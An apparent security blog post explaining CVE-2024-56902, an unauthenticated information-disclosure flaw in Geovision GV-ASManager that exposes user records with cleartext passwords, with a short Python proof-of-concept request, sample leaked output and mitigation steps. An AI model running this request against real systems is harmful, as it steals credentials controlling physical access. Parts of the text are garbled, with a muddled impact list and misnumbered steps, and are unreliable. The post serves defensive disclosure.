If you’re running Geovision GV-ASManager for your access control systems, especially version 6.1.. or older, you need to pay close attention. A new vulnerability, CVE-2024-56902, has been discovered, and it’s a big deal: attackers can get access to account information—including plain text passwords—without needing to hack or brute-force credentials.
This long read will explain how this vulnerability works, show you proof-of-concept code, discuss its impact, and offer guidance on what to do next. All details are based on community research and available advisories, with fresh insight just for you.
What is Geovision GV-ASManager?
Geovision GV-ASManager is a software suite commonly used for access control and security systems in businesses, campuses, and government facilities. It runs as a web application, so admins can configure doors, user credentials, and schedules remotely.
The Vulnerability: Simple But Dangerous
CVE-2024-56902 is classified as an information disclosure flaw. Specifically, attackers can access user records in the system—including the *username* and, most alarmingly, *their passwords in cleartext*—by calling a vulnerable web endpoint. No special privileges or authentication are required.
Vulnerable Endpoint
Based on research and PoCs, the vulnerable component is the /CardIssue/CardUserInfoList endpoint of the web interface:
Affected URL:
http://<GV-ASManager-IP>:80/CardIssue/CardUserInfoList
How Attackers Use It
With a single HTTP GET request, an unauthenticated user can grab a complete list of registered users and their corresponding information, including plaintext passwords.
Here’s a simple script to show how attackers might exploit this
import requests
# Put your target IP here
target_url = 'http://<GV-ASManager-IP>/CardIssue/CardUserInfoList';
r = requests.get(target_url)
if r.status_code == 200:
print("[+] Data leaked:")
print(r.text)
else:
print("[-] Exploit failed or not vulnerable")
Replace <GV-ASManager-IP> with the real address or hostname.
Sample Output
[
{
"UserName": "admin",
"Password": "supersecret123", # stored in cleartext!
"CardNumber": "00012345",
// ... more user fields
},
...
]
Original References
- NVD Entry: CVE-2024-56902
- Geovision Download Center / Release Notes
- Exploit Database Reference (if public):
Impact
Let’s be clear: If your GV-ASManager is publicly accessible, anyone can grab your system’s user list, find admin accounts, and log in using the revealed passwords. Attackers could:
System is exposed to the internet
- Many admins/users with weak or duplicate passwords
Mitigation Steps
1. IMMEDIATELY restrict network access to the web management interface. Block public access at your firewall.
2. Upgrade to the latest version of GV-ASManager as soon as possible. Check here for updates.
Change all passwords after patching—assume all previous ones are compromised.
4. Monitor logs for unusual access to the /CardIssue/CardUserInfoList endpoint.
Contact Geovision support for additional steps, as they may have mitigations or hotfixes.
6. If necessary, rotate access cards/credentials for all users managed by the affected server.
Enable HTTPS, firewall rules, and network segmentation.
- Regularly check for new CVEs affecting your devices and software.
Final Thoughts
This is a reminder to all security and facility teams: Always audit your web apps, especially those managing real-world access, for vulnerabilities like CVE-2024-56902. The password leak here isn’t just a bug, it’s a critical security failure. Patch your systems urgently and rotate all impacted credentials.
If you found this useful, or you want more long-form coverage of critical CVEs in simple language, let us know!
*Disclaimer: This article is for educational and defensive security purposes only. Do not attack systems you do not own or have explicit permission to test.*
Timeline
Published on: 02/03/2025 21:15:14 UTC
Last modified on: 03/04/2025 22:15:39 UTC